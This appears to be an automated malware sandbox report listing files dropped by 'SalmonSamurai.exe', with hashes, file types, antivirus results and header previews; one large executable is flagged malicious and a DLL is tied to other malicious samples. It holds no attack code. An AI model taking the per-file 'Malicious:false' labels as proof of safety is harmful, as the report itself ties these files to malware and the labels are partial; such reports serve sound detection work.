                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 33554432.000000, slope 35184388866048.000000
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):246294845
                                                                                                                                                                                                                                              Entropy (8bit):6.95746554896744
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1572864:KLBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj3:KypCmJctBjj2+JvFg+E2XdWU1Qt3
                                                                                                                                                                                                                                              MD5:42259B63C8D2B564557504B587E86073
                                                                                                                                                                                                                                              SHA1:E0B53769C0E3B0F296C9C94AC37F81800145A46B
                                                                                                                                                                                                                                              SHA-256:36485E67930FFF7A6F7E0E3156FD01817FEE62116B5E7E5257C4F2BC057CD779
                                                                                                                                                                                                                                              SHA-512:DB22AC07FB203B5009DA15D360A7F555FFD50D66C933F40E148B47FA5A986D976ACF11888D1FF2F31DB025FB94B1DE01C506F06EC142BB0A5707ED02E1C63647
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1096
                                                                                                                                                                                                                                              Entropy (8bit):5.13006727705212
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                                                                              MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                                                                              SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                                                                              SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                                                                                              SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8312662
                                                                                                                                                                                                                                              Entropy (8bit):4.705814170451806
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24576:dbTy6TU675kfWScRQfJw91SmfJB6i6e6R626X8HHdE/pG6:tygpj
                                                                                                                                                                                                                                              MD5:312446EDF757F7E92AAD311F625CEF2A
                                                                                                                                                                                                                                              SHA1:91102D30D5ABCFA7B6EC732E3682FB9C77279BA3
                                                                                                                                                                                                                                              SHA-256:C2656201AC86438D062673771E33E44D6D5E97670C3160E0DE1CB0BD5FBBAE9B
                                                                                                                                                                                                                                              SHA-512:DCE01F2448A49A0E6F08BBDE6570F76A87DCC81179BB51D5E2642AD033EE81AE3996800363826A65485AB79085572BBACE51409AE7102ED1A12DF65018676333
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):160143360
                                                                                                                                                                                                                                              Entropy (8bit):6.741790865491727
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1572864:mLBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj0:mypCmJctBjj2+Jv
                                                                                                                                                                                                                                              MD5:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                              SHA1:9EAC8A0CED4B353D3E1B17A3D844255FDCC14667
                                                                                                                                                                                                                                              SHA-256:40ABBA1E7DA7B3EAAD08A6E3BE381A9FC2AB01B59638912029BC9A4AA1E0C7A7
                                                                                                                                                                                                                                              SHA-512:757B1CA6D1BD47DE3CDAA5343E115CC4F35078FF450E99AD6DA879F7614E35D57600997D2F830777E965F901C6A61BB7888700B7547730B5C4C4C5F7A44603B0
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........."......0...8.......F.........@..........................................`...........................................+.. ..0"..h.......`....Pt.._@..........0.......!.......................!.(... Q..@...........@8......`.*......................text...:/.......0.................. ..`.rdata..h.n..@....n..4..............@..@.data....TB...1.......1.............@....pdata..._@..Pt..`@...9.............@..@.00cfg..0.............z.............@..@.gxfg...pA.......B....z.............@..@.retplne.............Dz..................rodata...... .......Fz............. ..`.tls.........@.......Xz.............@...CPADinfo8....P.......\z.............@...LZMADEC......`.......^z............. ..`_RDATA..\............pz.............@..@malloc_h+............rz............. ..`.rsrc...`............xz.............@..@.reloc......0........|.............@..B................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):127125
                                                                                                                                                                                                                                              Entropy (8bit):7.915612661029362
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:vlKzwqCT4wDNzIwL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:vlKzwt4uEgK18Gb0OV8ld0GecQ3f2
                                                                                                                                                                                                                                              MD5:ACD0FA0A90B43CD1C87A55A991B4FAC3
                                                                                                                                                                                                                                              SHA1:17B84E8D24DA12501105B87452F86BFA5F9B1B3C
                                                                                                                                                                                                                                              SHA-256:CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
                                                                                                                                                                                                                                              SHA-512:3E4C4F31C6C7950D5B886F6A8768077331A8F880D70B905CF7F35F74BE204C63200FF4A88FA236ABCCC72EC0FC102C14F50DD277A30F814F35ADFE5A7AE3B774
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):177406
                                                                                                                                                                                                                                              Entropy (8bit):7.939611912805236
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:4DQYaEQN6AJPKNzIwafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/rIM0:4DQYaNN68QEVgx5GMRejnbdZnVE6YopY
                                                                                                                                                                                                                                              MD5:4610337E3332B7E65B73A6EA738B47DF
                                                                                                                                                                                                                                              SHA1:8D824C9CF0A84AB902E8069A4DE9BF6C1A9AAF3B
                                                                                                                                                                                                                                              SHA-256:C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
                                                                                                                                                                                                                                              SHA-512:039B50284D28DCD447E0A486A099FA99914D29B543093CCCDA77BBEFDD61F7B7F05BB84B2708AE128C5F2D0C0AB19046D08796D1B5A1CFF395A0689AB25CCB51
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4916712
                                                                                                                                                                                                                                              Entropy (8bit):6.398049523846958
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                                                                                                                                                                              MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                                                                                                                                                                              SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                                                                                                                                                                              SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                                                                                                                                                                              SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: NativeApp_G5L1NHZZ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: AyqwnIUrcz.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: nanophanotool.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: 9VbeqQbgU4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: 9VbeqQbgU4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: ivySCI-5.6.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: ivySCI-5.6.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: MayitaV16.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2883072
                                                                                                                                                                                                                                              Entropy (8bit):6.697367886822868
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:YGJO72cNsdMZWfAn1fdmZMOqcQrGhjUHgNxGUwSCmmfYDJGz5SN3lzl3hSKqH:Jj8n1QqGCmmfIUz59t
                                                                                                                                                                                                                                              MD5:E096C168B79A56DED0DF1AA142D9F1DA
                                                                                                                                                                                                                                              SHA1:318F20DAB294A315BD935160E9417FB5B28300F5
                                                                                                                                                                                                                                              SHA-256:65CC75329D17EC264E7A2DB571EA55F918394241445EA64569A56C75D0CFDC60
                                                                                                                                                                                                                                              SHA-512:3DCCF6CE85EF7E75690A5851642F10BB5E6E1572E91E933BACB7FCBFE405B0412B94BA0E160C3BA8D68D2B9AFC1DA268F61C83DCCD6453D8C9470931EE900BFD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$#..................................................@B...........`A..........................................*.......*.(.............@...............B..3....).......................).(....R#.@............"*.P............................text....##......$#................. ..`.rdata..l....@#......(#.............@..@.data...x.....*.."....*.............@....pdata........@.......*.............@..@.00cfg..8.....A.......+.............@..@.gxfg....,....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....A.......+.............@..@.reloc...3....B..4....+.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10542048
                                                                                                                                                                                                                                              Entropy (8bit):6.277141340322909
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:98304:OKPBQYOo+ddlymOk25flQCUliXUxiG9Ha93Whla6ZGdnp/8k:OKPBhORjOhCliXUxiG9Ha93Whla6ZGrn
                                                                                                                                                                                                                                              MD5:D89CE8C00659D8E5D408C696EE087CE3
                                                                                                                                                                                                                                              SHA1:49FC8109960BE3BB32C06C3D1256CB66DDED19A8
                                                                                                                                                                                                                                              SHA-256:9DFBE0DAD5C7021CFE8DF7F52458C422CBC5BE9E16FF33EC90665BB1E3F182DE
                                                                                                                                                                                                                                              SHA-512:DB097CE3EB9E132D0444DF79B167A7DCB2DF31EFFBBD3DF72DA3D24AE2230CC5213C6DF5E575985A9918FBD0A6576E335B6EBC12B6258BC93FA205399DE64C37
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):481280
                                                                                                                                                                                                                                              Entropy (8bit):6.330677392522242
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:F9L2FFtoVsruIzUEzUST6uHKw+BubaOQ74PlqF8:F9CGafznzUSTRY70I
                                                                                                                                                                                                                                              MD5:1EECFB04C4434F5A813C8F0C0C8F2C88
                                                                                                                                                                                                                                              SHA1:6DC3CA4B3F72E7FB33BA26FA488DE323EDB59ADD
                                                                                                                                                                                                                                              SHA-256:897CEB95FB164640DDD2426673997B5F6FC2619FD916B038B575A70A0682A706
                                                                                                                                                                                                                                              SHA-512:D7818A42A76508AC3150AEA8D4E168B2DB36F55F71983A177002086380A82E307624CFE37B01FFC3D7EB407485D182654D0D7C6A0C06CCAAE60666630469C7E0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$................................................................`A........................................00......F>..(.......x.... ...C..............0....(.......................'..(...@A..@...........pA...............................text....".......$.................. ..`.rdata.......@.......(..............@..@.data....L....... ..................@....pdata...C... ...D..................@..@.00cfg..8....p......................@..@.gxfg...`$.......&..................@..@.retplne.............>...................tls....!............@..............@..._RDATA..\............B..............@..@.rsrc...x............D..............@..@.reloc..0............J..............@..B................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):7625728
                                                                                                                                                                                                                                              Entropy (8bit):6.463180789552528
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:98304:U8qvGdDtslh+LD3ZDWfnSvBSDU5bPm3k89Ld3gsOMt/:JD3ZXJ7bPWLWsD/
                                                                                                                                                                                                                                              MD5:CBA2436016F7A2838588A52D5B6F30F1
                                                                                                                                                                                                                                              SHA1:81DDF44B3E122DFBEE1A2CD8D4544364F1A621A4
                                                                                                                                                                                                                                              SHA-256:BCB3A3D2FCA3C33FA3D1D5DC976AA913CDC8001DF8E64C2CD3D2C545245141BF
                                                                                                                                                                                                                                              SHA-512:D92A880B5F83C5AE10AE9A83E38A293BB0E8C7659DD6ECE162FC752D57C9FCDE8036B81B023CD9F0F4F32B95B06FD4C366E20301010354B6CB904398A3149A44
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." ......Z...........M......................................`u...........`A..........................................k.8.....l.d....pt.......q.lO............t......vk.....................huk.(.....Z.@.............l.......k.@....................text...e.Z.......Z................. ..`.rdata..l.....Z.......Z.............@..@.data.........m..|....m.............@....pdata..lO....q..P....q.............@..@.00cfg..8.....t......Ps.............@..@.gxfg....+....t..,...Rs.............@..@.retplne.....@t......~s..................tls....:....Pt.......s.............@..._RDATA..\....`t.......s.............@..@.rsrc........pt.......s.............@..@.reloc........t.......s.............@..B................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):377708
                                                                                                                                                                                                                                              Entropy (8bit):5.4079285675542845
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:ebGJWQdLX/Wi6fR9a5DhZ2FQPnUGSBhjA636Zi2Jyn9Ybt5KXpgmLwSVxJsVxSjf:6GJW2bOi6fRmZ2OPnUThjA636Zi2Jynd
                                                                                                                                                                                                                                              MD5:7E51349EDC7E6AED122BFA00970FAB80
                                                                                                                                                                                                                                              SHA1:EB6DF68501ECCE2090E1AF5837B5F15AC3A775EB
                                                                                                                                                                                                                                              SHA-256:F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
                                                                                                                                                                                                                                              SHA-512:69DA19053EB95EEF7AB2A2D3F52CA765777BDF976E5862E8CEBBAA1D1CE84A7743F50695A3E82A296B2F610475ABB256844B6B9EB7A23A60B4A9FC4EAE40346D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):613642
                                                                                                                                                                                                                                              Entropy (8bit):4.894733266944232
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:b3pIuPzq8xSTwO8sgjZz5E9VJAVtnuviQix30jH8+I:b3plq8xLO8zjZz5E9VJAVtSiQO
                                                                                                                                                                                                                                              MD5:2009647C3E7AED2C4C6577EE4C546E19
                                                                                                                                                                                                                                              SHA1:E2BBACF95EC3695DAAE34835A8095F19A782CBCF
                                                                                                                                                                                                                                              SHA-256:6D61E5189438F3728F082AD6F694060D7EE8E571DF71240DFD5B77045A62954E
                                                                                                                                                                                                                                              SHA-512:996474D73191F2D550C516ED7526C9E2828E2853FCFBE87CA69D8B1242EB0DEDF04030BBCA3E93236BBD967D39DE7F9477C73753AF263816FAF7D4371F363BA3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):671738
                                                                                                                                                                                                                                              Entropy (8bit):4.903433286644294
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:gjptqBycpX8vYULIrmhkH+P5NNb++YTzgpPMgSENeX:BB2um5S++
                                                                                                                                                                                                                                              MD5:47A6D10B4112509852D4794229C0A03B
                                                                                                                                                                                                                                              SHA1:2FB49A0B07FBDF8D4CE51A7B5A7F711F47A34951
                                                                                                                                                                                                                                              SHA-256:857FE3AB766B60A8D82B7B6043137E3A7D9F5CFB8DDD942316452838C67D0495
